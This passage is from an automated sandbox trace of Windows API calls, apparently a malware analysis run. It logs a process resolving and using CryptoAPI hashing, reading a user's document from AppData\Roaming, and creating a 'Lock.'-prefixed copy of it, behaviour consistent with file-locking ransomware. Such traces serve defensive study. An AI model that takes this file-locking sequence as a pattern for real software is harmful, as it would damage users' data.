hHeap=0x25c0000) returned 1 [0198.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0198.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0198.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.541] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0198.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.541] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0198.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0198.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/fieUnO JbD.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fieuno jbd.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0198.546] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.546] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0198.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0198.546] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.546] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.546] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.fieUnO JbD.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.fieuno jbd.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0198.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0198.547] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0198.547] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.547] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.547] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0198.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.547] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0198.547] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0198.549] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x82dd, lpOverlapped=0x0) returned 1 [0198.550] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0198.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.552] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0198.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0198.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.553] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.553] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.554] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0198.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.555] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.555] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.555] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.555] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.555] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.556] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: 